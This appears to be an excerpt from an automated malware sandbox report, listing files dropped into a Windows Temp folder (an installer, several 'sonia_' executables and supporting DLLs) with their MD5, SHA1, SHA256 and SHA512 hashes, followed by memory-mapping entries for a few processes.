                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\libcurlpp.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\libgcc_s_dw2-1.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\libstdc++-6.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\libwinpthread-1.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_2.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_2.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_2.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_2.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_3.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_3.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_3.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_3.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_4.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_5.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_5.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_5.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_6.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_6.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\7zS8A66D494\sonia_6.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\CC4F.tmp
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d124f55b9393c976963407dff51ffa79

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          2c7bbedd79791bfb866898c85b504186db610b5d

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                        • memory/336-100-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/376-106-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/436-186-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                        • memory/612-122-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          100KB

                                                                                                                                                                                                        • memory/612-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                        • memory/612-89-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          572KB

                                                                                                                                                                                                        • memory/612-129-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          572KB

                                                                                                                                                                                                        • memory/612-91-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          152KB

                                                                                                                                                                                                        • memory/612-115-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          100KB

                                                                                                                                                                                                        • memory/612-92-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                        • memory/612-151-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                        • memory/612-105-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          100KB

